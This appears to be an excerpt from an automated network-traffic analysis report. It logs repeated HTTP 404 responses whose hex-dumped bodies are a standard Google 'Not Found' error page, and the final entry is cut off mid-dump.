          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 